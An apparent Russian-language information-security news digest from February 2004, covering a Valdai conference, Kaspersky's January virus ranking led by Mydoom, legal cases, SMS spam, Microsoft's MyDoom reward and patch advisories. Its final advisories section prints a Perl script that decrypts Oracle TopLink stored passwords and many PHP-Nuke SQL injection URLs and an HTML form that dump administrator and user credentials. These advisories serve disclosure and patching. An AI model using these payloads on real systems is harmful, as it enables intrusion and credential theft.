Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Содержание
- События, семинары, конференции, даты
- Исследования, открытия, лабораторные разработки
- Регулирование: Законы, постановления, сертификация, контроль
- Проблемные ситуации, информационная преступность, сетевые войны
- Технологии безопасности. Организации разработчики, интеграторы.
- Информационая безопасность бизнеса
- Информационая безопасность государственной власти
- Информационая безопасность общественной коммуникации, личности.
- Дыры и патчи программ и операционных сред
События, семинары, конференции, даты |
24–27 февраля пройдет конференция «Комплексная защита информации»
3 февраля | http://www.crime-research.ru/24–27 февраля пройдет 8-я Международная научно-практическая конференция
«Комплексная защита информации». Конференция будет проходить на Валдае (д/о
«Валадай») при поддержке Минсвязи России. Оргкомитет конференции возглавил
министр Российской Федерации по связи и информатизации Л. Д. Рейман.
Тематика конференции:
- Проблемы защиты информационных сетей и
систем;
- Проблемы защиты электронного документооборота как источника
региональных информационных ресурсов;
- Современные методы и средства защиты
информации в информационных системах;
- Теоретико-методологические основы и
модели информационной безопасности;
- Проблемы защиты некатегорированной
информации на региональном и муниципальном уровнях;
- Актуальные правовые
проблемы информационной безопасности и компьютерная преступность;
- Проблемы
качества подготовки специалистов в сфере защиты информации.
Прием
материалов и заявок на участие в конференции продлен до 7 февраля 2004 года.
Исследования, открытия, лабораторные разработки |
Обзор вирусной активности - январь 2004
3 февраля | astera"Лаборатория Касперского" опубликовала очередной
обзор вирусной активность за январь 2004 г.
*Другие вредносные программы 1,64 Кроме Mydoom.A в вирусной двадцатке появилось еще три новичка. В первую
очередь это I-Worm.Bagle, эпидемия которого началась в середине января и могла
бы стать самым заметным событием января, если бы не наш сегодняшний лидер. Очень
интересно появление в рейтинге макро-вируса Swatch.b. Впервые он был обнаружен
еще в сентябре 2002 года, однако до сих пор ему не удавалось выйти на
более-менее значимые позиции в общем показателе вирусной активности. С чем
связан такой стремительный рывок данного вируса сказать сложно, однако данный
факт, вкупе с двумя другими макро-вирусами в нашей двадцатке, заставляет
констатировать, что слухи о кончине вирусов для MS Word, пока, так слухами и
остаются. Последним новичком января стал очередной вариант почтового червя Dumaru - J.
Четыре новых вируса, плюс вернувшийся в рейтинг Lentin.g, полностью вытеснили из
20-ки традиционные файловые вирусы и бэкдоры. Mydoom.A легко потеснил с верхних строк недавних лидеров рейтинга - Swen и
Mimail.C, а вот червь Sober.C полностью повторяет судьбу своего предшественника
- варианта А. Напомним, что в первый месяц существования Sober.A занимал 6-ое
место, на второй - 4-ое, а на третий месяц покинул вирусную двадцатку. Тоже
самое происходит и с Sober.C - 6-ое место в декабре, 4-ое в январе. Последует ли за этим его исчезновение из февральского рейтинга ? Не сдает
своих позиций лидер прошлого года - червь Sobig.F. Поднявшись в декабре до 9-го
места, он и в январе смог удержаться на данной позиции. Это тем более
удивительно, если вспомнить о заложенном в черве ограничении по сроку действия
до 10 сентября 2003 года. В двадцатке появились четыре новых вредоносных программ: черви Mydoom.a,
Bagle, Dumaru.j и макро-вирус Swatch.b Повысили свой рейтинг Sober.c и Lentin.j.
Понизили свои показатели Swen, Mimail.c, Mimail.a, Mimail.g, Tanatos.b,
Lentin.m, Dumaru.a, Thus-based, Saver, Lentin.o, Mimail.j. В хит-парад вернулcя
Lentin.g. Информационная служба "Лаборатории Касперского".
Изменение позиции
Название вредоносной программы
Доля в общем числе вирусных инцидентов
(%)
1
New
I-Worm.Mydoom.a
78,32
2
-1
I-Worm.Swen
6,57
3
-1
I-Worm.Mimail.c
3,63
4
+2
I-Worm.Sober.c
2,11
5
-1
I-Worm.Mimail.a
1,96
6
New
I-Worm.Bagle
1,12
7
0
I-Worm.Klez.h
0,80
8
-4
I-Worm.Mimai.g
0,74
9
0
I-Worm.Sobig.f
0,54
10
-5
I-Worm.Tanatos.b
0,34
11
+3
I-Worm.Lentin.j
0,30
12
re-entry
I-Worm.Lentin.g
0,27
13
-5
I-Worm.Lentin.m
0,26
14
New
Macro.Word97.Swatch.b
0,23
15
-5
I-Worm.Dumaru.a
0,22
16
-4
Macro.Word97.Thus-based
0,22
17
-4
Macro.Word97.Saver
0,21
18
-3
I-Worm.Lentin.o
0,20
19
New
I-Worm.Dumaru.j
0,15
20
-9
I-Worm.Mimail.j
0,15
Безусловно, главным событием января
стало появление и стремительное распространение почтового червя Mydoom.
Появившись 27 января, он менее чем за одну неделю смог превзойти показатели
прошлогоднего лидера - Sobig.F и занять собой более трех четвертей всего
вирусного хит-парада.
Регулирование: Законы, постановления, сертификация, контроль |
Суд рассмотрит вопрос о легальности пиринговых сетей Grokster и Morpheus
3 февраля | compulentaВ ближайшее время выездной апелляционный суд Соединенных Штатов начнет слушания апелляции по искам звукозаписывающей и кинематографической индустрий против компаний Grokster и StreamCast Networks. Последние, напомним, являются поставщиками программного обеспечения для обмена файлами через пиринговые сети Grokster и Morpheus.
По мнению владельцев авторских прав, обе вышеназванные службы должны быть немедленно закрыты, поскольку их подписчики активно обмениваются пиратскими копиями музыкальных и видеофайлов. Однако, в апреле прошлого года суд низшей инстанции постановил, что компании Grokster и StreamCast Networks не несут ответственности за действия пользователей, поскольку не имеют средств контроля за распространяемым внутри сетей контентом.
В итоге, неудовлетворенные исходом дела RIAA и MPAA подали апелляцию. Адвокаты правообладателей утверждают, что при вынесении вердикта судья Стивен Уилсон опирался не на те факты. В частности, Уилсон сослался на решение Верховного суда США, который в 1984 году постановил, что производители видеомагнитофонов не несут ответственности за то, что с помощью их аппаратуры создаются нелегальные копии фильмов.
В RIAA и MPAA, напротив, уверены, что в Grokster и StreamCast Networks знают, чем занимаются пользователи Р2Р-сервисов, а посему принадлежащие им службы ничем не лучше печально известной сети Napster, закрытой решением суда около трех лет назад. Однако, сеть Napster, в отличие от Grokster и Morpheus, выступала в роли централизованного хранилища данных, так что владельцы могли легко установить факт обмена пиратскими файлами. Тогда как у Grokster и StreamCast Networks просто-напросто нет такой возможности. Тем не менее, владельцы копирайта надеются, что апелляционный суд применит самые жесткие санкции к операторам служб Grokster и Morpheus.
За взлом сети подросток будет 200 часов трудиться на благо общества
3 февраля | securitylab.ruБританский подросток, взломавший в июне 2002 года компьютерную сеть американской правительственной лаборатории, проведет 200 часов, занимаясь общественно полезным трудом. Такое решение принял королевский суд Саутворка (Southwark Crown Court) в Лондоне.
Суд отказался удовлетворить выдвинутое обвинением требование возместить нанесенный хакером ущерб в размере 21 000 фунтов стерлингов (около 38 000 долларов США), решив, что 19-летний студент первого курса университета Эксетера ( Exeter University) Джозеф МакЭлрой (Joseph McElroy) не в состоянии выплатить такую сумму.
МакЭлрой воспользовался слабостью системы идентификации пользователей компьютерной сети лаборатории Ферми, занимающейся изучением физики элементарных частиц высоких энергий (Fermi National Accelerator Laboratory), расположенной в американском городе Чикаго (Chicago). Молодой хакер не пытался получить доступ к секретной информации, он использовал пропускную способность сети лаборатории для того, чтобы скачать из Интернета большое количество музыкальных файлов и лицензионных фильмов.
Деятельность хакера привела к тому, что в лаборатории была объявлена тревога. Из-за опасений, что несанкционированный доступ могли получить террористы, взломанный компьютер не включали в течение трех дней.
Изобретатель отсудил $189 млн
3 февраля | asteraТОКИО - Японский суд, рассматривавший конфликт
между компанией Nichia и ее бывшим сотрудником, профессором Судзи Накамурой,
вынес решение, которое может стать важным прецедентом для изобретателей,
отстаивающих свои авторские права. Согласно постановлению суда Nichia должна
выплатить Накамуре 20 млрд иен ($189 млн) за разработанную им технологию
изготовления голубых светодиодов.
Изобретенные Накамурой для Nichia диоды
сейчас широко используются в осветительных устройствах, мобильных телефонах,
оборудовании для регулировки уличного движения и многих других видах продукции.
Благодаря этой технологии Nichia зарабатывает миллиарды иен
ежегодно.
Никогда еще в Японии индивидуальные изобретатели не получали
столь крупной компенсации от компаний, как в деле Накамуры. Нормой в этой стране
на протяжении десятилетий считалась беззаветная преданность служащих
корпоративным ценностям. "Нынешнее решение дает надежду на то, что мечты
подрастающего поколения о научных свершениях сбудутся, - говорит Накамура, ныне
профессор Калифорнийского университета в Санта-Барбаре. - Если бы не это
постановление, мне пришлось бы обратиться ко всем исследователям Японии,
призывая их уезжать в США".
Японские компании, в отличие от американских,
как правило, не оговаривают в контрактах с работниками вопросы интеллектуальной
собственности. Nichia заявила о намерении подать апелляцию. "Это несправедливое
решение, - говорится в заявлении компании. - Оно переоценивает значимость
патента и не учитывает вклада, внесенного множеством других исследователей и
самой корпорацией".
Ученый изначально настаивал на уплате ему 20 млрд
иен, и суд удовлетворил его требования, одновременно указав, что Накамура мог бы
претендовать на 60 млрд иен с учетом объемов продаж Nichia и размеров
лицензионных отчислений. Адвокаты Накамуры заявили, что потребуют увеличения
размера выплат до 60 млрд иен, но признали, что судебная баталия далека от
завершения и что дело может дойти и до Верховного суда.
Судья Риоиши
Мимура пояснил, что данное дело носит особый характер в связи с огромным
доходом, который приносит компании рассматриваемое изобретение, и тем, что
изобретатель работал в одиночку. (DJ, 30. 01. 2004, Александр Сафин).
Проблемные ситуации, информационная преступность, сетевые войны |
Расследование онлайнового мошенничества закончилось в саду марихуаны
3 февраля | runetВ процессе рейда по делу фальшивых интернет-продаж,
полицейские наткнулись на преступление иного рода. Подозреваемый веб-аферист
выращивал марихуану в собственной спальне.
В маленьком
американском городке, что на севере от Модесто произошла достаточно забавная
история.
Полицейские из отдела по борьбе с преступлениями в сфере высоких технологии проводили расследование очередной онлайновой аферы. Некто предлагал на интернет-аукционе цифровые камеры. Желающие приобрести гаджет отправляли деньги по указанному почтовому адресу. Но получить заветную покупку они так и не смогли: лихой продавец торговал воздухом.
В процессе расследования офицеры полиции отправились на обыск квартиры предполагаемого преступника. Войдя в помещение, стражи правопорядка удивились жутко высокой температуре воздуха. Ответ на вопрос нашелся в спальне. Под сильными лампами созревали кустики марихуаны. Там же лежали многочисленные упаковки травы.
Жилец квартиры - 28-летний Уэйн Кристофер Митчелл - вернулся домой вскоре после ухода офицеров. Однако был задержан законопослушными соседями до возвращения полицейских.
Помимо марихуаны в квартире были найдены улики онлайнового мошенничества, включая информацию о том, что г-н Митчелл обманул более двух дюжин людей. Обнаружены компьютеры, CD-проигрыватели, камеры и пиратское программное обеспечение.
Уэйн Кристофер Митчелл был арестован и препровожден в тюрьму. Ему вменяют кражи, жульничество и обвинения, связанные с наркотиками. На данный момент мужчина выпущен под залог, - сообщает АР.
Азиатский «сюрприз»: мобильный спам
3 февраля | runetМобильные телефоны становятся мишенью электронных нежелательных рассылок. В Азии маркетологи все больше используют сервис текстовых сообщений, чтобы добраться до карманов потребителей.
«Проблема sms-спама очень остро стоит там, где мобильная коммуникация является доминирующей. Специалисты должны уделить ей чрезвычайное внимание», - считает Джефф Буллвинкел из корпорации Microsoft.
Сотовые операторы не очень охотно идут на разговор об отчетливо проявившейся тенденции. Однако доказательства проблемы имеются на веб-сайте самой крупной японской мобильной компании NTT DoCoMo.
На ресурсе содержится предупреждение о нежелательном сообщении, в котором отправитель пишет о том, что ему необходима определенная группы крови для операции. Там же даются инструкции переслать это sms другим реципиентам. В противном случае, получателю угрожают финансовыми последствиями. Кроме того, NTT DoCoMo извещает о ложных сообщениях, которые приходят якобы от их имени с требованием выслать деньги на определенный банковский счет.
Мобильный гигант, чей подписчик отправляет в день в среднем 10 сообщений, борется с sms-спамом разным образом. Блокирует тексты большого объема, ликвидирует линии, в некоторых случаях прибегает к юридическим санкциям.
Однако стоит отметить, sms-сервис очень ценный источник доходов мобильных компаний. Таким образом, несмотря на то, что сотовые операторы борются с «занозой», данный вид спама приносит им прибыль.
Что же касается обычных пользователей в Азии, то для них это головная боль, ведь отправка и получение сообщений стали для многих стилем жизни. К сожалению, именно чрезвычайная популярность услуги и послужила толчком к воплощению новой тактики продаж. Маркетологам нравиться мгновенность сервиса, а также повышенное внимание, которое получатели оказывают входящим сообщениям, - сообщает Reuters.
Киберсквоттеры не намерены отказываться от прибыльного бизнеса
3 февраля | http://www.crime-research.ruВ 2003 году количество жалоб от компаний и известных частных лиц на деятельность
киберсквоттеров практически не изменилось в сравнении с данными 2002 года. Это
позволяет сделать вывод о том, что несмотря на ряд судебных разбирательств,
киберсквоттеры по-прежнему занимаются регистрацией доменных имен, содержащих
названия компаний или имена знаменитостей, с целью перепродажи с многократной
наценкой.
Арбитражная комиссия WIPO (Всемирной организации по защите
интеллектуальной собственности) рассмотрела 1100 случаев киберсквоттерства в
2003 году, что составляет примерно три жалобы в день. Свежие примеры "спорных"
доменных имен: pepsi-smash.com, calvinklein-watches.com, piercebrosnan.com и
jrrtolkien.com, сообщает AFP.
Владелец прав на торговую марку имеет
право обратиться в подразделение ООН по защите интеллектуальной собственности
или в WIPO, если он считает, что торговая марка используется другим лицом без
соответствующих на то прав. WIPO может передать торговую марку владельцу после
рассмотрения дела, но не имеет права взимать штраф с киберсквоттера за
использование чужой интеллектуальной собственности. Как правило, более 80
процентов подобных дел решаются в пользу правообладателя.
Сохранение
большого количества жалоб на действия киберсквоттеров, в основном, вызвано
появлением новых доменных зон, как региональных, так и специализированных
общемировых. По сравнению же с 1999 годом, число жалоб снизилось: тогда WIPO
получала примерно пять жалоб в неделю.
Технологии безопасности. Организации разработчики, интеграторы. |
Интернет хотят попилить на две части
3 февраля | webplanet«Интернет необходимо разделить на две части: одна
часть будет полностью контролируема и безопасна, а вторая останется
такой же „дикой“, каким сейчас является Всемирная паутина», — говорит Джон
Карр (John Carr), британский специалист в области информационных
технологий.
Джон Карр, ведущий спикер конференции
Комментируя свой вывод, Джон Карр также упоминает увеличивающееся присутствие
детской порнографии и прочего криминала:
«Интернет никогда не был и не будет полностью безопасным, и не
только для детей, но для любого пользователя. Однако уже сейчас есть реальная
возможность начать переводить интернет в более безопасный режим. Мы должны
думать о будущем интернета сейчас, чтобы потом не оказалось слишком
поздно.
Речь Джона Карра была встречена аплодисментами публики, собравшейся на
конференцию. Вместе с тем, со стороны поборников гражданских свобод
поступила критика. Поборникам не понравилось то, что Джон оставил право на
существование «дикому» интернету. Они заявили, что такой путь развития
Сети — суть поощрение детской порнографии. Для иллюстрации были приведены
результаты исследований, которые показали, что каждый третий подписчик сайта
с детской порнографией занимался развращением детей в реальной жизни.
Альтернативу нынешнему интернету я вижу в разделении его на
несколько (две и, возможно, более) частей. Одна из них будет находиться под
полным контролем соответствующих органов и будет абсолютно безопасна для
проведения электронных транзакций и документооборота. Вы будете точно
знать, кто ваш собеседник или контрагент.
Параллельно с безопасной Сетью
будет существовать та Сеть, которая нам известна сейчас — дикая
и свободная, но без
Сейчас еще не
поздно начать идти по этому пути. Но время очень быстро уходит».
Информационая безопасность бизнеса |
Microsoft готов заплатить 250 тысяч долларов США за информацию, которая приведет к аресту авторов вируса MyDoom.B
3 февраля | asteraРедмонд, США - Корпорация Microsoft объявила о
том, что выплатит награду в размере 250 тысяч долларов США за информацию,
которая приведет к аресту лиц, ответственных за появление интернет-червя
MyDoom.B. MyDoom.B, впервые обнаруженный 28 января 2004 г., является
разновидностью появившегося ранее интернет-червя MyDoom.A, также известного под
названием Novarg, эпидемия которого недавно охватила множество компьютеров по
всему миру. Появление версии B данной вредоносной программы 28 января привело к
первому срабатыванию системы оповещения о кибепреступлениях Министерства
внутренней безопасности США (Department of Homeland
Security). * Центр по борьбе с интернет-преступлениями (Internet Fraud
Complaint Center) - http://www.ifccfbi.gov/.
Характеристики MyDoom.B
Ниже
перечислены основные характеристики интернет-червя MyDoom.B.
* Скрытно
заразив компьютер, червь находит на нем файлы, содержащие адреса электронной
почты, и рассылает по ним зараженные письма.
* Блокирует доступ к сайтам
производителей антивирусов и www.microsoft.com.
* Открывает зараженный
компьютер для доступа извне, позволяя хакерам скрытно модифицировать код
червя.
* Червь запрограммирован на организацию в феврале 2004 года атаки
на сайт www.microsoft.com.
"Этот червь создавался с преступными
намерениями, - заявил Брэд Смит, вице-президент и генеральный консультант
Microsoft. - Он призван осложнить работу пользователей компьютеров и закрыть им
доступ к сайтам производителей антивирусов и другим ресурсам, где они могли бы
получить помощь. Задача Microsoft - помочь властям задержать
преступников".
Поскольку распространяющиеся через Интернет вирусы не
признают никаких государственных границ, вознаграждение может получить житель
любой страны, если это допускается ее законами.
Программа
сотрудничества с правоохранительными органами
Объявление об
учреждении Microsoft премиального фонда в размере 5 миллионов долларов было
сделано в ноябре прошлого года в ходе совместной пресс-конференции с
представителями ФБР, Интерпола и службы внешней разведки США. Все эти
организации уже обращались к помощи Microsoft при проведении расследования,
предметом которого является данный червь.
Лица, располагающие информацией
о черве MyDoom или любых других червях и вирусах, могут использовать для связи с
правоохранительными организациями указанные ниже адреса.
* Интерпол -
национальная штаб-квартира Интерпола в любой стране, являющейся членом данной
организации, а также веб-сервер http://www.interpol.int/.
* ФБР и служба
внешней разведки США - любое местное представительство этих организаций.
Безопасность в настоящее
время входит в число главных приоритетов Microsoft: компания стремится
обеспечить максимальную защищенность всего разрабатываемого программного
обеспечения, а также помочь заказчикам обезопаситься от атак злоумышленников.
Microsoft стремится постоянно информировать пользователей о том, какие шаги им
необходимо предпринять для защиты своих компьютеров. В частности, на это
направлена реализуемая корпорацией программа Protect Your PC, с более подробной
информацией о которой можно ознакомиться по адресу
http://www.microsoft.com/protect/. Microsoft не только прилагает все усилия к
повышению защищенности своего ПО, но и тесно сотрудничает с международными,
федеральными и местными правоохранительными органами, помогая им в поиске
злоумышленников, занимающихся организацией атак на компьютерные
системы.
Информационая безопасность государственной власти |
Президент Чувашии Н. Федоров подписал несколько указов, использовав при этом свою электронную подпись.
3 февраля | e-rusПрезидент Чувашии Николай Федоров в пятницу подписал ряд указов,
использовав при этом в том числе и электронную подпись. В частности, им были
подписаны указы "О территориальной комплексной схеме градостроительного
планирования развития территории Чувашской Республики (ЧР)" и "О дополнительных
мерах по стимулированию жилищного строительства в Чувашской
Республики".
Как сообщил председатель республиканского комитета по связи и информатизации Дмитрий Назипов, электронные подписи были поставлены на планшетном беспроводном компьютере президента Чувашии, в разъем которого был вставлен его личный ключ – USB-токен. Подписанные документы были направлены по электронной почте для опубликования в СМИ и размещения на официальном Интернет-портале органов власти республики. По словам Д. Назипова, преимущества электронной подписи известны: быстрота, удобство, отсутствие бумаг. Электронный документ аутентичен бумажному оригиналу, стопроцентно защищен, может храниться вечно, а будучи размещенным в сети Интернет – мгновенно доступен из любой точки земного шара. Технические сложности, связанные с обеспечением документов электронной подписью, сказал он, в Чувашии уже решены. Все республиканские и муниципальные органы власти оснащены сертифицированным программным обеспечением. Республиканский удостоверяющий центр, функционирующий при госкомитете Чувашии по связи и информатизации, генерирует ключи и контролирует защищенный электронный документооборот.
Между тем, отметил Д. Назипов, существуют проблемы правовые. Принятый год назад федеральный закон "Об электронной цифровой подписи" страдает декларативностью и отсутствием детально прописанных норм. Не урегулирован статус электронного документа в целом. Один из подписанных в пятницу с использованием электронной подписи указов президента Чувашии посвящен важному аспекту правового регулирования "электронного правительства". Указ устанавливает, что официальным опубликованием актов президента и правительства Чувашии считается первая публикация их полного текста в республиканской газете "Вести Чувашии", "Собрании законодательства Чувашской Республики" или на портале органов государственной власти в сети Интернет. Это принципиально важное решение уравнивает электронные и печатные источники, придавая легитимность официальной информации, размещенной на республиканском правительственном портале, – подчеркнул Д. Назипов. Одновременно расширению области применения электронной подписи в республике ведется активное внедрение системы электронного документооборота в архитектуре Интранет. Бумаги стремительно вытесняются из документооборота как республиканских, так и муниципальных органов власти республики.
Несколькими днями ранее постановлением правительства Чувашии утвержден перечень сведений, размещаемых на портале. Органы исполнительной власти обязаны размещать широкий перечень информации – от принимаемых нормативных документов и новостей до кадровых вакансий и перечня услуг, оказываемых органами власти гражданам и организациям. Аналогичный перечень рекомендован и для сайтов муниципальных органов власти. В соответствии с постановлением, активно ведутся работы по модернизации сайтов органов власти и портала в целом. Результаты реализации пилотных проектов федеральной целевой программы "Электронная Россия" все больше сказываются на практической деятельности органов власти республики, на повседневной жизни граждан. В рамках сотрудничества с Минсвязи России созданы муниципальные центры общественного доступа во всех районах и городах республики. Работы по модернизации и развитию портала ведутся совместно с Минэкономразвития России. Власть в республике становится все более прозрачной и эффективной, более близкой и понятной жителям Чувашии, – считает Д. Назипов.
Информационая безопасность общественной коммуникации, личности. |
Осторожно: в России - "левый" SanDisk!
3 февраля | asteraВ российской рознице появились карты памяти
формата Secure Digital c надписью "SanDisk", в упаковке зеленого цвета, без
всяких опознавательных знаков. Словом, вот такого вида:
Компания SanDisk в связи с этим
уведомляет, что никогда не выпускала карты памяти в подобной упаковке.
Итого, имеем на нашем рынке еще один случай фальсификации и подделки.
Так что, будьте внимательны при покупке и не спонсируйте проходимцев!
Microsoft залатала три дыры в своем браузере
3 февраля | asteraКорпорация Microsoft в понедельник выпустила новый
бюллетень безопасности MS04-004, устраняющий сразу три
уязвимости в браузере Internet Explorer.
Первая из заделанных дыр была обнаружена еще в середине декабря прошлого
года. Суть ошибки сводится к тому, что хакер может отобразить в адресной строке
поддельный URL, не соответствующий реальному. В результате, веб-страница,
содержащая вредоносный код, может быть замаскирована под заслуживающий доверия
ресурс, что, в свою очередь, приведет у утечке персональной информации. Вторая
уязвимость позволяет злоумышленнику сохранить на локальном диске компьютера
какой-либо файл без предварительного согласия пользователя. Для этого нужно лишь
заманить владельца атакуемой машины на сформированный особым образом сайт и
вынудить его кликнуть по ссылке. Наконец, последняя ошибка связана с реализацией
модели междоменной защиты браузера и позволяет хакеру получить полный доступ к
файловой системе удаленного ПК. Все дыры получили рейтинг критической важности и
требуют немедленной установки патча, который можно загрузить на официальном сайте софтверного гиганта. Следует заметить, что уязвимости представляют угрозу лишь для пользователей
компьютеров, на которых установлены браузеры Internet Explorer версий 6.0, 5.01
и 5.5 под управлением операционных систем Windows NT 4.0, Windows NT 4.0
Terminal Server Edition, Windows 2000, Windows XP и Windows Server
2003.
Дыры и патчи программ и операционных сред |
Патч для Internet Explorer (MS04-004)
3 февраля | securitylab.ruПрограмма: Microsoft Internet Explorer 6 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.01 Опасность: Критическая Наличие эксплоита: Нет Описание: Microsoft выпустила заплату для Internet Explorer, которая устраняет три уязвимости. Одна из этих уязвимостей позволяет удаленному пользователю скомпрометировать удаленную систему. Уязвимость в проверке правильности входных данных обнаружена в файле Internet Explorer travel log, который используется для хранения списка недавно посещенных сайтов. В результате удаленный пользователь может сконструировать специально обработанный HTML документ, чтобы внедрить злонамеренный URL в travel log, который выполнит произвольный код сценария на компьютере пользователя в контексте зоны безопасности "MyComputer" при попытке обработать этот URL. Также патч устраняет 2 ранее обнаруженные уязвимости: http://www.securitylab.ru/41437.html http://www.securitylab.ru/41661.html URL производителя: http://www.Microsoft.com Решение:Установите соответствующее обновление вручную или через Windows Update: Internet Explorer 6 Service Pack 1: http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=en Internet Explorer 6 Service Pack 1 (64-Bit Edition): http://www.microsoft.com/downloads/details.aspx?FamilyId=326EFFDA-8D86-4683-BC77-9BF410BC620D&displaylang=en Internet Explorer 6 for Windows Server 2003: http://www.microsoft.com/downloads/details.aspx?FamilyId=D78AE4F7-8852-4A04-B8F6-1DE327E598F0&displaylang=en Internet Explorer 6 for Windows Server 2003 (64-Bit Edition): http://www.microsoft.com/downloads/details.aspx?FamilyId=6A7894F0-789F-4152-9AE4-8DCB43404149&displaylang=en Internet Explorer 6: http://www.microsoft.com/downloads/details.aspx?FamilyId=BE0C18BC-7F9A-4196-BFDE-29EBA8CF7A50&displaylang=en Internet Explorer 5.5 Service Pack 2: http://www.microsoft.com/downloads/details.aspx?FamilyId=EFFE87F6-7ACA-4A54-B767-5597DDE95C6F&displaylang=en Internet Explorer 5.01 Service Pack 4: http://www.microsoft.com/downloads/details.aspx?FamilyId=F5E74139-6E0E-49FD-9AA2-36D2D8454A92&displaylang=en Internet Explorer 5.01 Service Pack 3: http://www.microsoft.com/downloads/details.aspx?FamilyId=202D3AAC-6B56-4F4A-8C0F-4183C77B6B51&displaylang=en Internet Explorer 5.01 Service Pack 2: http://www.microsoft.com/downloads/details.aspx?FamilyId=17904608-DCEE-4C99-A780-81D6DBC48DD5&displaylang=en |
Слабый алгоритм Шифрования в OracleAS TopLink Mapping Workbench
3 февраля | securitylab.ru
Программа: OracleAS TopLink Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в OracleAS TopLink Mapping Workbench. Локальный пользователь может расшифровать пароли, хранящиеся в XML файлах. Сообщается, что OracleAS TopLink Mapping Workbench использует слабый алгоритм шифрования для хранения паролей в XML файлах. Локальный пользователь может расшифровать зашифрованные пароли. Пример/Эксплоит: #!/usr/bin/perl #Decrypt Oracle Toplink Mapping WorkBench passwords. #Author: Martin $string = "A7FCAA504BA7E4FC"; sub usage { print " Usage: $0 <password to decrypt>\n"; } if ($#ARGV != 0) { usage(); } else { $encrypted = $ARGV[0]; $encrypted =~ s/$string/ /; $chars = length($encrypted); $enc2 = substr($encrypted,0,2); $encrypted = substr($encrypted,2,length($encrypted)); $i = 0; while (($chars / 2) >= $i + 1) { print $i; $int = hex($enc2); if (($i%2) == 1) { $result .= chr($int - ( ($i + 1 )/3 ) - 112); } else { $result .= chr($int - 4 + $i); } $enc2 = substr($encrypted,0,length($encrypted) - 1); $encrypted = substr($encrypted,2,length($encrypted)); $i++; } print "$result\n"; } URL производителя: http://www.oracle.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Поднятие локальных привилегий pfexec(1) команде в Solaris 8 и 9
3 февраля | securitylab.ru
Программа: Sun Solaris 8, 9 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в pfexec(1) команде в Solaris 8 и 9. Локальный пользователь может выполнить profile команду с поднятыми привилегиями. Сообщается, что пользователь с определенными правами может выполнить profile команду с более высокими привилегиями в случае, когда база данных профиля выполнения (exec_attr(4)) содержит некорректную запись для этого профиля. URL производителя:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57453 Решение:Установите соответствующее исправление: SPARC Platform * Solaris 8 with patch 109007-15 or later * Solaris 9 with patch 116237-01 or later x86 Platform * Solaris 8 with patch 109008-15 or later * Solaris 9 with patch 116238-01 or later |
Множественные уязвимости в PHP-Nuke
3 февраля | securitylab.ru
Программа: PHP-Nuke 6.9 и более ранние версии Опасность: Высокая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в PHP-Nuke. Злонамеренный пользователь может просматривать и манипулировать чувствительными данными. Четыре различные модуля ("Web_Links", "Downloads", "Sections” и "Reviews") уязвимы к SQL инъекции. Пример/Эксплоит: - http://[target]/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION %20SELECT%201,aid,name,pwd%20FROM%20nuke_authors Display the login, the name and the password of an administrator if the link 0 does not exist. - http://[target]/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20 SELECT%20pwd%20FROM%20nuke_authors Re-steer towards the encrypted password. - http://[target]/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20 UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/* Display all the logins administrator as well as their encrypted passwords. - http://[target]/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 %20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors Display logins, names and encrypted passwords of all the administrators. - http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20 UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/* Display all the pseudos of the users, followed by their encrypted password. - http://[target]/modules.php?name=Downloads&d_op=modifydownloadrequest& lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name, user_email,user_level,0,0%20FROM%20nuke_users Display logins, ID, encrypted passwords, names, emails and levels of all the registered members. - http://[target]/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20 SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 - http://[target]/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20 SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 Re-steer towards the encrypted password of the user id of which is 5. - http://[target]/modules.php?name=Downloads&d_op=viewdownloadcomments& lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20 FROM%20nuke_users/* http://[target]/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1 %20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users Display logins, ID and encrypted password of all the members. - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION %20SELECT%20pwd%20FROM%20nuke_authors - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION %20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/* - http://[target]/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20 SELECT%20aid,pwd%20FROM%20nuke_authors http://[target]/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20 SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors - http://[target]/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20 SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho rs/* - FORM : --------------------PHPNUKEexploit1.html-------------------- <html> <head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head> <body> <form method="POST" action="http://[target]/modules.php?name=Sections"> <input type="hidden" name="op" value="printpage"> <input type="text" name="artid" value="-1 UNION SELECT CONCAT(name,char (58),aid),pwd FROM nuke_authors"> <input type="submit"> </form> <p align="right">A patch can be found on <a href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br> For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-026.html" target="_blank"> Security-Corporation.com</a></p> 